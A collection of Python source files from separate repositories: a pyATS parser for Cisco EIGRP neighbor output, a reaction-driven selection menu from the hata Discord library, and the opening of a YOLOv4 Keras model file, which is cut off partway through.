cli_command = ['show eigrp ipv4 vrf {vrf} neighbors',
'show eigrp ipv4 neighbors']
exclude = ['dead_time', 'hold']
def cli(self, vrf='all', output=None):
if output is None:
if vrf:
cmd = self.cli_command[0].format(vrf=vrf)
else:
cmd = self.cli_command[1]
show_output = self.device.execute(cmd)
else:
show_output = output
return super().cli(output=show_output, vrf=vrf)
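
# Hedged usage sketch (editor addition): parse a captured output string instead
# of executing on a live device. The sample lines come from the regex comments
# above; `device` is an assumed connected pyATS device object.
def _demo_show_eigrp_ipv4(device):
    raw = ('IPv4-EIGRP VR(test) Neighbors for AS(100) VRF default\n'
           '1   10.23.90.3              Gi0/0/0/1.90              13 01:41:56   13   200  0  23\n')
    parser = ShowEigrpIpv4Neighbors(device=device)
    return parser.parse(output=raw)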
class ShowEigrpIpv6Neighbors(ShowEigrpNeighborsSuperParser,
ShowEigrpNeighborsSchema):
cli_command = ['show eigrp ipv6 vrf {vrf} neighbors',
'show eigrp ipv6 neighbors']
exclude = ['hold']
def cli(self, vrf='all', output=None):
if output is None:
if vrf:
cmd = self.cli_command[0].format(vrf=vrf)
else:
cmd = self.cli_command[1]
show_output = self.device.execute(cmd)
else:
show_output = output
return super().cli(output=show_output, vrf=vrf)
class ShowEigrpNeighborsDetailSchema(MetaParser):
''' Schema for
* 'show eigrp ipv4 neighbors detail'
* 'show eigrp ipv4 vrf {vrf} neighbors detail'
* 'show eigrp ipv6 neighbors detail'
* 'show eigrp ipv6 vrf {vrf} neighbors detail'
'''
schema = {
'eigrp_instance': {
Any(): {
'vrf': {
Any(): {
'address_family': {
Any(): {
'name': str,
'named_mode': bool,
'eigrp_interface': {
Any(): {
'eigrp_nbr': {
Any(): {
'retransmit_count': int,
'retry_count': int,
'last_seq_number': int,
'srtt': float,
'rto': int,
'q_cnt': int,
'peer_handle': int,
'nbr_sw_ver': {
'os_majorver': int,
'os_minorver': int,
'tlv_majorrev': int,
'tlv_minorrev': int, },
'hold': int,
'uptime': str,
'bfd': str,
'prefixes': int, }, },
},
},
},
},
},
},
},
},
}
# ================================================
# Parser for
# 'show eigrp ipv4 neighbors detail'
# 'show eigrp ipv4 vrf {vrf} neighbors detail'
# 'show eigrp ipv6 neighbors detail'
# 'show eigrp ipv6 vrf {vrf} neighbors detail'
# ================================================
class ShowEigrpNeighborsDetailSuperParser(ShowEigrpNeighborsDetailSchema):
def cli(self, vrf='', output=None):
# IPv4-EIGRP VR(test) Neighbors for AS(100) VRF VRF1
# IPv4-EIGRP VR(test) Neighbors for AS(100) VRF default
# IPv6-EIGRP VR(test) Neighbors for AS(100) VRF default
# IPv6-EIGRP VR(test) Neighbors for AS(100) VRF VRF1
        r1 = re.compile(r'^(?P<address_family>IPv4|IPv6)\-EIGRP\s+'
                        r'(?:VR\(?(?P<name>\S+)\))?\s*Neighbors\s*for\s*'
                        r'AS\(\s*(?P<as_num>\d+)\)\s*VRF\s*(?P<vrf>\S+)$')
# 1 10.23.90.3 Gi0/0/0/1.90 11 01:43:15 13 200 0 23
# 1 10.23.90.3 Gi0/0/0/1.390 14 01:41:47 4 200 0 15
# 0 10.12.90.1 Gi0/0/0/0.390 13 02:54:01 816 4896 0 8
        r2 = re.compile(r'^(?P<peer_handle>\d+) +'
                        r'(?P<nbr_address>\S+) +'
                        r'(?P<eigrp_interface>[A-Za-z]+\s*[\d\/\.]+) +'
                        r'(?P<hold>\d+) +(?P<uptime>\S+) +'
                        r'(?P<srtt>\d+) +'
                        r'(?P<rto>\d+) +'
                        r'(?P<q_cnt>\d+) +'
                        r'(?P<last_seq_number>\d+)$')
# 1 Link Local Address: Gi0/0/0/1.390 11 01:42:44 9 200 0 14
# 0 Link Local Address: Gi0/0/0/0.390 12 02:31:47 4 200 0 9
        r3 = re.compile(r'^(?P<peer_handle>\d+) +Link\s+Local\s+Address: +'
                        r'(?P<eigrp_interface>[A-Za-z]+\s*[\d\/\.]+) +'
                        r'(?P<hold>\d+) +(?P<uptime>\S+) +(?P<srtt>\d+) +'
                        r'(?P<rto>\d+) +(?P<q_cnt>\d+) +'
                        r'(?P<last_seq_number>\d+)$')
# fe80::5c00:ff:fe02:7
# fe80::5c00:ff:fe02:7
r4 = re.compile(r'^(?P<nbr_address>\S+)$')
# Version 23.0/2.0, Retrans: 1, Retries: 0, Prefixes: 6
# Version 8.0/1.2, Retrans: 1, Retries: 0, Prefixes: 5
        r5 = re.compile(r'Version\s*'
                        r'(?P<os_majorver>\d+)\.(?P<os_minorver>\d+)\/'
                        r'(?P<tlv_majorrev>\d+)\.(?P<tlv_minorrev>\d+), +'
                        r'Retrans\s*:\s*(?P<retransmit_count>\d+)\, +'
                        r'Retries\s*:\s*(?P<retry_count>\d+)\,* *'
                        r'(?:Prefixes\s*:\s*(?P<prefixes>\d+))?')
# BFD disabled
r6 = re.compile(r'^BFD\s+(?P<bfd>\w+)$')
parsed_dict = {}
for line in output.splitlines():
line = line.strip()
# IPv4-EIGRP VR(test) Neighbors for AS(100) VRF VRF1
# IPv4-EIGRP VR(test) Neighbors for AS(100) VRF default
# IPv6-EIGRP VR(test) Neighbors for AS(100) VRF default
# IPv6-EIGRP VR(test) Neighbors for AS(100) VRF VRF1
result = r1.match(line)
if result:
group = result.groupdict()
name = group['name']
named_mode = True if name else False
address_family = group['address_family'].lower()
eigrp_instance = group['as_num']
vrf = group['vrf']
continue
# 1 10.23.90.3 Gi0/0/0/1.90 11 01:43:15 13 200 0 23
# 1 10.23.90.3 Gi0/0/0/1.390 14 01:41:47 4 200 0 15
# 0 10.12.90.1 Gi0/0/0/0.390 13 02:54:01 816 4896 0 8
result = r2.match(line)
if result:
group = result.groupdict()
if not vrf:
vrf = 'default'
if not eigrp_instance:
eigrp_instance = ''
eigrp_interface = Common.convert_intf_name\
(intf=group['eigrp_interface'])
nbr_address = group['nbr_address']
address_family_dict = parsed_dict\
.setdefault('eigrp_instance', {})\
.setdefault(eigrp_instance, {})\
.setdefault('vrf', {})\
.setdefault(vrf, {})\
.setdefault('address_family', {})\
.setdefault(address_family, {})
address_family_dict['name'] = name
address_family_dict['named_mode'] = named_mode
ip_dict = address_family_dict.setdefault('eigrp_interface', {})\
.setdefault(eigrp_interface, {})\
.setdefault('eigrp_nbr', {}).setdefault(nbr_address, {})
ip_dict['peer_handle'] = int(group['peer_handle'])
ip_dict['hold'] = int(group['hold'])
ip_dict['uptime'] = group['uptime']
ip_dict['srtt'] = float(group['srtt'])/1000
ip_dict['rto'] = int(group['rto'])
ip_dict['q_cnt'] = int(group['q_cnt'])
ip_dict['last_seq_number'] = int(group['last_seq_number'])
continue
# 1 Link Local Address: Gi0/0/0/1.390 11 01:42:44 9 200 0 14
# 0 Link Local Address: Gi0/0/0/0.390 12 02:31:47 4 200 0 9
result = r3.match(line)
if result:
group = result.groupdict()
if not vrf:
vrf = 'default'
if not eigrp_instance:
eigrp_instance = ''
eigrp_interface = Common.convert_intf_name\
(intf=group['eigrp_interface'])
peer_handle = int(group['peer_handle'])
hold = int(group['hold'])
uptime = group['uptime']
srtt = float(group['srtt'])/1000
rto = int(group['rto'])
q_cnt = int(group['q_cnt'])
last_seq_number = int(group['last_seq_number'])
continue
# fe80::5c00:ff:fe02:7
# fe80::5c00:ff:fe02:7
result = r4.match(line)
if result:
group = result.groupdict()
nbr_address = group['nbr_address']
address_family_dict = parsed_dict\
.setdefault('eigrp_instance', {})\
.setdefault(eigrp_instance, {})\
.setdefault('vrf', {})\
.setdefault(vrf, {})\
.setdefault('address_family', {})\
.setdefault(address_family, {})
address_family_dict['name'] = name
address_family_dict['named_mode'] = named_mode
ip_dict = address_family_dict.setdefault('eigrp_interface', {})\
.setdefault(eigrp_interface, {})\
.setdefault('eigrp_nbr', {}).setdefault(nbr_address, {})
ip_dict['peer_handle'] = peer_handle
ip_dict['hold'] = hold
ip_dict['uptime'] = uptime
ip_dict['srtt'] = srtt
ip_dict['rto'] = rto
ip_dict['q_cnt'] = q_cnt
ip_dict['last_seq_number'] = last_seq_number
continue
# Version 23.0/2.0, Retrans: 1, Retries: 0, Prefixes: 6
# Version 8.0/1.2, Retrans: 1, Retries: 0, Prefixes: 5
result = r5.match(line)
if result:
group = result.groupdict()
sw_ver_dict = ip_dict.setdefault('nbr_sw_ver', {})
# Version begin
sw_ver_dict['os_majorver'] = int(group['os_majorver'])
sw_ver_dict['os_minorver'] = int(group['os_minorver'])
sw_ver_dict['tlv_majorrev'] = int(group['tlv_majorrev'])
sw_ver_dict['tlv_minorrev'] = int(group['tlv_minorrev'])
# Version end
ip_dict['retransmit_count'] = \
int(group['retransmit_count'])
ip_dict['retry_count'] = int(group['retry_count'])
prefixes = group['prefixes']
ip_dict['prefixes'] = int(prefixes) if prefixes else 0
continue
# BFD disabled
result = r6.match(line)
if result:
group = result.groupdict()
ip_dict['bfd'] = group['bfd']
return parsed_dict
class ShowEigrpIpv4NeighborsDetail(ShowEigrpNeighborsDetailSuperParser,
ShowEigrpNeighborsDetailSchema):
cli_command = ['show eigrp ipv4 vrf {vrf} neighbors detail',
'show eigrp ipv4 neighbors detail', ]
exclude = ['hold']
def cli(self, vrf='all', output=None):
if output is None:
if vrf:
cmd = self.cli_command[0].format(vrf=vrf)
else:
cmd = self.cli_command[1]
show_output = self.device.execute(cmd)
else:
show_output = output
return super().cli(output=show_output, vrf=vrf)
class ShowEigrpIpv6NeighborsDetail(ShowEigrpNeighborsDetailSuperParser,
ShowEigrpNeighborsDetailSchema):
cli_command = ['show eigrp ipv6 vrf {vrf} neighbors detail',
'show eigrp ipv6 neighbors detail', ]
exclude = ['hold']
def cli(self, vrf='all', output=None):
if output is None:
if vrf:
cmd = self.cli_command[0].format(vrf=vrf)
else:
cmd = self.cli_command[1]
show_output = self.device.execute(cmd)
else:
show_output = output
return super().cli(output=show_output, vrf=vrf)

# ======================================================================
# File: hata/ext/command_utils/choose_menu.py
# Repo: asleep-cult/hata  |  License: 0BSD
# ======================================================================
# -*- coding: utf-8 -*-
__all__ = ('ChooseMenu', )
from ...backend.futures import Task
from ...discord.client_core import KOKORO
from ...discord.emoji import BUILTIN_EMOJIS
from ...discord.parsers import InteractionEvent
from ...discord.message import Message
from ...discord.channel import ChannelTextBase
from ...discord.exceptions import DiscordException, ERROR_CODES
from ...discord.embed import Embed
from .utils import GUI_STATE_READY, GUI_STATE_SWITCHING_PAGE, GUI_STATE_CANCELLING, GUI_STATE_CANCELLED, \
GUI_STATE_SWITCHING_CTX, Timeouter
class ChooseMenu:
"""
    Similar to ``Pagination``, but instead of just displaying multiple pages of text, it allows the user to select
    a displayed option.
    The class allows every user to modify or close its representation. Also works in private channels.
    Picks up both reaction additions and reaction deletions, and removes the added reactions if it has the
    permission to do so (which it might not have, for example in DM-s).
Attributes
----------
canceller : `None` or `function`
The function called when the ``ChooseMenu`` is cancelled or when it expires. This is a onetime use and after
it was used, is set as `None`.
channel : ``ChannelTextBase`` instance
The channel where the ``ChooseMenu`` is executed.
check : `None` or `callable`
A callable what decides whether the ``ChooseMenu`` should process a received reaction event. Defaults to
`None`.
Should accept the following parameters:
+-----------+---------------------------------------------------+
| Name | Type |
+===========+===================================================+
| event | ``ReactionAddEvent`` or ``ReactionDeleteEvent`` |
+-----------+---------------------------------------------------+
Note, that ``ReactionDeleteEvent`` is only given, when the client has no `manage_messages` permission.
Should return the following values:
+-------------------+-----------+
| Name | Type |
+===================+===========+
| should_process | `bool` |
+-------------------+-----------+
client : ``Client``
The client who executes the ``ChooseMenu``.
embed : ``EmbedBase`` instance
An embed base, what's description and footer will be rendered with the given choices and with information
about the respective page.
message : `None` or ``Message``
The message on what the ``ChooseMenu`` is executed.
selected : `int`
The currently selected option of the ``ChooseMenu``.
    choices : `indexable` of `Any`
        An indexable container, which stores the displayable choices.
        Its elements' types can differ from each other, and different structures act differently as well.
        There are the following cases:
        - If an element is a `str` instance, then it will be used as an option's title, and only that
            variable will be passed to the respective function when selected.
        - If an element is neither `str` nor `tuple`, then its `repr` will be used as an option's title, and only that
            variable will be passed to the respective function when selected.
        - If an element is a `tuple` instance, then its first element will be displayed as the title. If that is `str`,
            it is added as-is, otherwise its `repr` is used. When selecting a `tuple` option,
            its elements will be passed to the respective function.
task_flag : `int`
A flag to store the state of the ``ChooseMenu``.
Possible values:
+---------------------------+-------+-----------------------------------------------------------------------+
| Respective name | Value | Description |
+===========================+=======+=======================================================================+
| GUI_STATE_READY | 0 | The ChooseMenu does nothing, is ready to be used. |
+---------------------------+-------+-----------------------------------------------------------------------+
| GUI_STATE_SWITCHING_PAGE | 1 | The ChooseMenu is currently changing it's page. |
+---------------------------+-------+-----------------------------------------------------------------------+
| GUI_STATE_CANCELLING | 2 | The ChooseMenu is currently changing it's page, but it was cancelled |
| | | meanwhile. |
+---------------------------+-------+-----------------------------------------------------------------------+
| GUI_STATE_CANCELLED | 3 | The ChooseMenu is, or is being cancelled right now. |
+---------------------------+-------+-----------------------------------------------------------------------+
| GUI_STATE_SWITCHING_CTX | 4 | The ChooseMenu is switching context. Not used by the default class, |
| | | but expected. |
+---------------------------+-------+-----------------------------------------------------------------------+
timeout : `float`
The timeout of the ``ChooseMenu`` in seconds.
timeouter : `None` or ``Timeouter``
Executes the timing out feature on the ``ChooseMenu``.
prefix : `None` or `str`
A prefix displayed before each option.
    selector : `async-callable`
        An `async-callable`, which is ensured when an option is selected.
        If the ``ChooseMenu`` is created with only `1` option, then it is ensured immediately instead of creating the
        ``ChooseMenu`` itself. In this case, if `message` was not given (or given as `None`), then the `message`
        passed to the `selector` will be `None` as well.
At least 3 parameters are passed to the `selector`:
+-------------------+-------------------------------+
| Respective name | Type |
+===================+===============================+
| client | ``Client`` |
+-------------------+-------------------------------+
| channel | ``ChannelTextBase`` instance |
+-------------------+-------------------------------+
| message | ``Message`` or `None` |
+-------------------+-------------------------------+
        The rest of the parameters depend on the respective choice (an element of ``choices``). If the element is a
        `tuple` instance, then its elements will be passed, however if the choice is any other type, then only that
        object will be passed.
Class Attributes
----------------
UP : ``Emoji`` = `BUILTIN_EMOJIS['arrow_up_small']`
The emoji used to move on the displayed option one above.
DOWN : ``Emoji`` = `BUILTIN_EMOJIS['arrow_down_small']`
The emoji used to move on the displayed option one under.
LEFT : ``Emoji`` = `BUILTIN_EMOJIS['arrow_backward']`
The emoji used to move on the previous page.
RIGHT : ``Emoji`` = `BUILTIN_EMOJIS['arrow_forward']`
The emoji used to move on the next page.
SELECT : ``Emoji`` = `BUILTIN_EMOJIS['ok']`
The emoji used to select an option.
CANCEL : ``Emoji`` = `BUILTIN_EMOJIS['x']`
The emoji used to cancel the ``ChooseMenu``.
EMOJIS_RESTRICTED : `tuple` (`Emoji`, `Emoji`, `Emoji`, `Emoji`) = `(UP, DOWN, SELECT, CANCEL)`
Restricted emojis, added when the choose menu has only options for 1 page.
EMOJIS : `tuple` (`Emoji`, `Emoji`, `Emoji`, `Emoji`, `Emoji`, `Emoji`) = `(UP, DOWN, LEFT, RIGHT, SELECT, CANCEL)`
Emojis added to the choose menu.
"""
UP = BUILTIN_EMOJIS['arrow_up_small']
DOWN = BUILTIN_EMOJIS['arrow_down_small']
LEFT = BUILTIN_EMOJIS['arrow_backward']
RIGHT = BUILTIN_EMOJIS['arrow_forward']
SELECT = BUILTIN_EMOJIS['ok']
CANCEL = BUILTIN_EMOJIS['x']
EMOJIS_RESTRICTED = (UP, DOWN, SELECT, CANCEL)
EMOJIS = (UP, DOWN, LEFT, RIGHT, SELECT, CANCEL)
__slots__ = ('canceller', 'channel', 'check', 'client', 'embed', 'message', 'selected', 'choices', 'task_flag',
'timeout', 'timeouter', 'prefix', 'selector')
async def __new__(cls, client, channel, choices, selector, embed=Embed(), timeout=240., message=None, prefix=None,
check=None):
"""
Creates a new choose menu with the given parameters.
This method is a coroutine.
Parameters
----------
client : ``Client``
The client who executes the ``ChooseMenu``.
        channel : ``ChannelTextBase``, ``Message`` or ``InteractionEvent`` instance
The channel where the ``ChooseMenu`` is executed. Pass it as a ``Message`` instance to send a reply.
If given as ``InteractionEvent``, then will acknowledge it and create a new message with it as well.
Although will not acknowledge it if `message` is given.
        choices : `indexable` of `Any`
            An indexable container, which stores the displayable choices.
            Its elements' types can differ from each other, and different structures act differently as well.
            There are the following cases:
            - If an element is a `str` instance, then it will be used as an option's title, and only
                that variable will be passed to the respective function when selected.
            - If an element is neither `str` nor `tuple`, then its `repr` will be used as an option's title, and only
                that variable will be passed to the respective function when selected.
            - If an element is a `tuple` instance, then its first element will be displayed as the title. If that is
                `str`, it is added as-is, otherwise its `repr` is used. When selecting a `tuple`
                option, its elements will be passed to the respective function.
        selector : `async-callable`
            An `async-callable`, which is ensured when an option is selected.
            If the ``ChooseMenu`` is created with only `1` option, then it is ensured immediately instead of creating
            the ``ChooseMenu`` itself. In this case, if `message` was not given (or given as `None`), then the
            `message` passed to the `selector` will be `None` as well.
At least 3 parameters are passed to the `selector`:
+-------------------+-----------------------------------------------------------+
| Respective name | Type |
+===================+===========================================================+
| client | ``Client`` |
+-------------------+-----------------------------------------------------------+
| channel | ``ChannelTextBase``, ``Message`` or ``InteractionEvent`` |
+-------------------+-----------------------------------------------------------+
| message | ``Message`` or `None` |
+-------------------+-----------------------------------------------------------+
            The rest of the parameters depend on the respective choice (an element of ``choices``). If the element is a
            `tuple` instance, then its elements will be passed, however if the choice is any other type, then only that
            object will be passed.
embed : ``Embed`` (or any compatible)
An embed base, what's description and footer will be rendered with the given choices and with information
about the respective page. Defaults to an empty ``Embed`` instance.
timeout : `float`, Optional
The timeout of the ``ChooseMenu`` in seconds. Defaults to `240.0`.
message : `None` or ``Message``, Optional
The message on what the ``ChooseMenu`` will be executed. If not given a new message will be created.
Defaults to `None`.
prefix : `None` or `str`, Optional
A prefix displayed before each option. Defaults to `None`.
check : `None` or `callable`, Optional
A callable what decides whether the ``ChooseMenu`` should process a received reaction event. Defaults to
`None`.
Should accept the following parameters:
+-----------+---------------------------------------------------+
| Name | Type |
+===========+===================================================+
| event | ``ReactionAddEvent`` or ``ReactionDeleteEvent`` |
+-----------+---------------------------------------------------+
Note, that ``ReactionDeleteEvent`` is only given, when the client has no `manage_messages` permission.
Should return the following values:
+-------------------+-----------+
| Name | Type |
+===================+===========+
| should_process | `bool` |
+-------------------+-----------+
Returns
-------
self : `None` or ``ChooseMenu``
If `choices`'s length is less than `2`, then returns `None`.
Raises
------
TypeError
`channel`'s type is incorrect.
ValueError
            If `prefix` was not given as `None` and its length is over `100` characters.
"""
if (prefix is not None) and (len(prefix) > 100):
raise ValueError(f'Please pass a prefix, what is shorter than 100 characters, got {prefix!r}.')
if isinstance(channel, ChannelTextBase):
target_channel = channel
received_interaction = False
elif isinstance(channel, Message):
target_channel = channel.channel
received_interaction = False
elif isinstance(channel, InteractionEvent):
target_channel = channel.channel
received_interaction = True
else:
            raise TypeError(f'`channel` can be given only as `{ChannelTextBase.__name__}`, `{Message.__name__}` '
                f'or as `{InteractionEvent.__name__}` instance, got {channel.__class__.__name__}.')
result_ln = len(choices)
if result_ln < 2:
if result_ln == 1:
choice = choices[0]
if isinstance(choice, tuple):
coro = selector(client, channel, message, *choice)
else:
coro = selector(client, channel, message, choice)
await coro
return None
self = object.__new__(cls)
self.check = check
self.client = client
self.channel = target_channel
self.choices = choices
self.selector = selector
self.selected = 0
self.canceller = cls._canceller
self.task_flag = GUI_STATE_READY
self.message = message
self.timeout = timeout
self.timeouter = None
self.prefix = prefix
self.embed = embed
try:
if message is None:
if received_interaction:
if not channel.is_acknowledged():
await client.interaction_response_message_create(channel)
message = await client.interaction_followup_message_create(channel, embed=self._render_embed())
else:
message = await client.message_create(channel, embed=self._render_embed())
self.message = message
else:
await client.message_edit(message, embed=self._render_embed())
if not target_channel.cached_permissions_for(client).can_add_reactions:
return self
for emoji in (self.EMOJIS if (len(choices) > 10) else self.EMOJIS_RESTRICTED):
await client.reaction_add(message, emoji)
except BaseException as err:
if isinstance(err, ConnectionError):
return self
if isinstance(err, DiscordException):
if err.code in (
ERROR_CODES.unknown_message, # message deleted
ERROR_CODES.unknown_channel, # message's channel deleted
ERROR_CODES.max_reactions, # reached reaction 20, some1 is trolling us.
ERROR_CODES.invalid_access, # client removed
ERROR_CODES.invalid_permissions, # permissions changed meanwhile
ERROR_CODES.cannot_message_user, # user has dm-s disallowed
):
return self
raise
self.timeouter = Timeouter(self, timeout=timeout)
client.events.reaction_add.append(message, self)
client.events.reaction_delete.append(message, self)
return self
def _render_embed(self):
"""
        Renders the choose menu's embed's description with the choices of the respective page and its footer
        with page information.
Returns
-------
embed : ``Embed`` (or any compatible)
The rendered embed.
"""
selected = self.selected
choices = self.choices
index = (selected//10)*10
end = index+10
if len(choices) < end:
end = len(choices)
parts = []
prefix = self.prefix
left_length = 195
if (prefix is not None):
left_length -= len(prefix)
while True:
title = choices[index]
            if isinstance(title, tuple):
if not title:
title = ''
else:
title = title[0]
            if not isinstance(title, str):
title = str(title)
if len(title) > left_length:
space_position = title.rfind(' ', left_length-25, left_length)
if space_position == -1:
space_position = left_length-3
title = title[:space_position]+'...'
if index == selected:
if (prefix is not None):
parts.append('**')
parts.append(prefix)
parts.append('** ')
parts.append('**')
parts.append(title)
parts.append('**\n')
else:
if (prefix is not None):
parts.append(prefix)
parts.append(' ')
parts.append(title)
parts.append('\n')
            index += 1
if index == end:
break
embed = self.embed
embed.description = ''.join(parts)
        current_page = (selected//10)+1
        limit = len(choices)
        page_limit = ((limit-1)//10)+1
        # `start` is the 1-based index of the first option shown on this page;
        # `end` (computed above) is the 1-based index of the last one
        start = (selected//10)*10+1
        embed.add_footer(f'Page {current_page}/{page_limit}, {start} - {end} / {limit}, selected: {selected+1}')
return embed
async def __call__(self, client, event):
"""
Called when a reaction is added or removed from the respective message.
This method is a coroutine.
Parameters
----------
client : ``Client``
The client who executes the ``ChooseMenu``
event : ``ReactionAddEvent``, ``ReactionDeleteEvent``
The received event.
"""
if event.user.is_bot:
return
if (event.emoji not in (self.EMOJIS if len(self.choices)>10 else self.EMOJIS_RESTRICTED)):
return
client = self.client
if (event.delete_reaction_with(client) == event.DELETE_REACTION_NOT_ADDED):
return
check = self.check
if (check is not None):
try:
should_continue = check(event)
except BaseException as err:
await client.events.error(client, f'{self!r}.__call__', err)
return
if not should_continue:
return
task_flag = self.task_flag
if task_flag != GUI_STATE_READY:
if task_flag == GUI_STATE_SWITCHING_PAGE:
if event.emoji is self.CANCEL:
self.task_flag = GUI_STATE_CANCELLING
return
# ignore GUI_STATE_CANCELLED and GUI_STATE_SWITCHING_CTX
return
message = self.message
while True:
emoji = event.emoji
if emoji is self.UP:
selected = self.selected-1
break
if emoji is self.DOWN:
selected = self.selected+1
break
if emoji is self.LEFT:
selected = self.selected-10
break
if emoji is self.RIGHT:
selected = self.selected+10
break
if emoji is self.CANCEL:
self.task_flag = GUI_STATE_CANCELLED
try:
await client.message_delete(message)
except BaseException as err:
self.cancel()
if isinstance(err, ConnectionError):
# no internet
return
if isinstance(err, DiscordException):
if err.code in (
ERROR_CODES.unknown_channel, # message's channel deleted
ERROR_CODES.unknown_message, # message deleted
ERROR_CODES.invalid_access, # client removed
):
return
await client.events.error(client, f'{self!r}.__call__', err)
return
else:
self.cancel()
return
if emoji is self.SELECT:
self.task_flag = GUI_STATE_SWITCHING_CTX
self.cancel()
try:
if self.channel.cached_permissions_for(client).can_manage_messages:
await client.reaction_clear(message)
else:
for emoji in self.EMOJIS:
await client.reaction_delete_own(message, emoji)
except BaseException as err:
if isinstance(err, ConnectionError):
# no internet
return
if isinstance(err, DiscordException):
if err.code in (
ERROR_CODES.unknown_message, # message already deleted
ERROR_CODES.unknown_channel, # channel deleted
ERROR_CODES.invalid_access, # client removed
ERROR_CODES.invalid_permissions, # permissions changed meanwhile
):
return
await client.events.error(client, f'{self!r}.__call__', err)
return
selector = self.selector
try:
choice = self.choices[self.selected]
channel = self.channel
if isinstance(choice, tuple):
coro = selector(client, channel, message, *choice)
else:
coro = selector(client, channel, message, choice)
await coro
except BaseException as err:
await client.events.error(client, f'{self!r}.__call__ when calling {selector!r}', err)
return
return
if selected < 0:
selected = 0
elif selected >= len(self.choices):
selected = len(self.choices)-1
if self.selected == selected:
return
self.selected = selected
self.task_flag = GUI_STATE_SWITCHING_PAGE
try:
await client.message_edit(message, embed=self._render_embed())
except BaseException as err:
self.task_flag = GUI_STATE_CANCELLED
self.cancel()
if isinstance(err, ConnectionError):
# no internet
return
if isinstance(err, DiscordException):
if err.code in (
ERROR_CODES.unknown_message, # message already deleted
ERROR_CODES.unknown_channel, # message's channel deleted
ERROR_CODES.invalid_access, # client removed
):
return
# We definitely do not want to silence `ERROR_CODES.invalid_form_body`
await client.events.error(client, f'{self!r}.__call__', err)
return
if self.task_flag == GUI_STATE_CANCELLING:
self.task_flag = GUI_STATE_CANCELLED
try:
await client.message_delete(message)
except BaseException as err:
if isinstance(err, ConnectionError):
# no internet
return
if isinstance(err, DiscordException):
if err.code in (
ERROR_CODES.unknown_channel, # channel deleted
ERROR_CODES.unknown_message, # message deleted
ERROR_CODES.invalid_access, # client removed
):
return
await client.events.error(client, f'{self!r}.__call__', err)
return
self.cancel()
return
self.task_flag = GUI_STATE_READY
self.timeouter.set_timeout(self.timeout)
    async def _canceller(self, exception):
"""
Used when the ``ChooseMenu`` is cancelled.
First of all removes the choose menu from waitfors, so it will not wait for reaction events, then sets the
``.task_flag`` of the it to `GUI_STATE_CANCELLED`.
If `exception` is given as `TimeoutError`, then removes the ``ChooseMenu``'s reactions from the respective
message.
This method is a coroutine.
Parameters
----------
exception : `None` or ``BaseException`` instance
Exception to cancel the ``ChooseMenu`` with.
"""
client = self.client
message = self.message
client.events.reaction_add.remove(message, self)
client.events.reaction_delete.remove(message, self)
if self.task_flag == GUI_STATE_SWITCHING_CTX:
            # the message is not ours; we should not do anything with it.
return
self.task_flag = GUI_STATE_CANCELLED
if exception is None:
return
if isinstance(exception, TimeoutError):
if self.channel.cached_permissions_for(client).can_manage_messages:
try:
await client.reaction_clear(message)
except BaseException as err:
if isinstance(err, ConnectionError):
# no internet
return
if isinstance(err, DiscordException):
if err.code in (
ERROR_CODES.unknown_message, # message deleted
ERROR_CODES.unknown_channel, # channel deleted
ERROR_CODES.invalid_access, # client removed
ERROR_CODES.invalid_permissions, # permissions changed meanwhile
):
return
await client.events.error(client, f'{self!r}._canceller', err)
return
return
timeouter = self.timeouter
if (timeouter is not None):
timeouter.cancel()
# we do nothing
def cancel(self, exception=None):
"""
Cancels the choose menu, if it is not cancelled yet.
Parameters
----------
exception : `None` or ``BaseException`` instance, Optional
Exception to cancel the choose menu with. Defaults to `None`
"""
canceller = self.canceller
if canceller is None:
return
self.canceller = None
timeouter = self.timeouter
if timeouter is not None:
timeouter.cancel()
return Task(canceller(self, exception), KOKORO)
def __repr__(self):
"""Returns the choose menu's representation."""
result = [
'<', self.__class__.__name__,
' client=', repr(self.client),
', choices=', repr(len(self.choices)),
', selected=', repr(self.selected),
', channel=', repr(self.channel),
', selector=', repr(self.selector),
]
prefix = self.prefix
if (prefix is not None):
result.append(', prefix=')
result.append(repr(prefix))
result.append(', task_flag=')
task_flag = self.task_flag
result.append(repr(task_flag))
result.append(' (')
task_flag_name = (
'GUI_STATE_READY',
'GUI_STATE_SWITCHING_PAGE',
'GUI_STATE_CANCELLING',
'GUI_STATE_CANCELLED',
'GUI_STATE_SWITCHING_CTX',
)[task_flag]
result.append(task_flag_name)
result.append(')>')
return ''.join(result)
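
# Hedged usage sketch (editor addition): `client` and `message` are assumed to
# come from a running hata bot. The selector coroutine receives the picked
# element after the user reacts with the SELECT emoji.
async def _demo_selector(client, channel, message, choice):
    await client.message_create(channel, f'You picked: {choice}')

async def _demo_choose(client, message):
    # `ChooseMenu.__new__` is a coroutine, so instantiation must be awaited
    await ChooseMenu(client, message.channel, ['red', 'green', 'blue'],
        _demo_selector, embed=Embed('Pick a color'), timeout=120.)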

# ======================================================================
# File: yolov3/yolov4.py
# Repo: 5TechG-IT/5tg_ml_realTimeHumanDetection  |  License: MIT
# ======================================================================
import numpy as np
import tensorflow as tf
from tensorflow.keras.layers import Conv2D, Input, LeakyReLU, ZeroPadding2D, BatchNormalization, MaxPool2D
from tensorflow.keras.regularizers import l2
from yolov3.configs import *
STRIDES = np.array(YOLO_STRIDES)
ANCHORS = (np.array(YOLO_ANCHORS).T/STRIDES).T
def read_class_names(class_file_name):
    # loads class names from a file
names = {}
with open(class_file_name, 'r') as data:
for ID, name in enumerate(data):
names[ID] = name.strip('\n')
return names
class BatchNormalization(BatchNormalization):
# "Frozen state" and "inference mode" are two separate concepts.
# `layer.trainable = False` is to freeze the layer, so the layer will use
# stored moving `var` and `mean` in the "inference mode", and both `gamma`
# and `beta` will not be updated!
def call(self, x, training=False):
if not training:
training = tf.constant(False)
training = tf.logical_and(training, self.trainable)
return super().call(x, training)
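
# Hedged illustration (editor addition): with `trainable = False` the layer
# above stays in inference mode even when called with training=True, because
# of the `tf.logical_and` in `call`.
def _demo_frozen_bn():
    bn = BatchNormalization()
    bn.trainable = False
    x = tf.zeros((1, 4, 4, 8))
    return bn(x, training=True)  # logical_and(True, False) -> inference mode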
def convolutional(input_layer, filters_shape, downsample=False, activate=True, bn=True, activate_type='leaky'):
if downsample:
input_layer = ZeroPadding2D(((1, 0), (1, 0)))(input_layer)
padding = 'valid'
strides = 2
else:
strides = 1
padding = 'same'
conv = Conv2D(filters=filters_shape[-1], kernel_size = filters_shape[0], strides=strides,
padding=padding, use_bias=not bn, kernel_regularizer=l2(0.0005),
kernel_initializer=tf.random_normal_initializer(stddev=0.01),
bias_initializer=tf.constant_initializer(0.))(input_layer)
if bn:
conv = BatchNormalization()(conv)
    if activate:
if activate_type == "leaky":
conv = LeakyReLU(alpha=0.1)(conv)
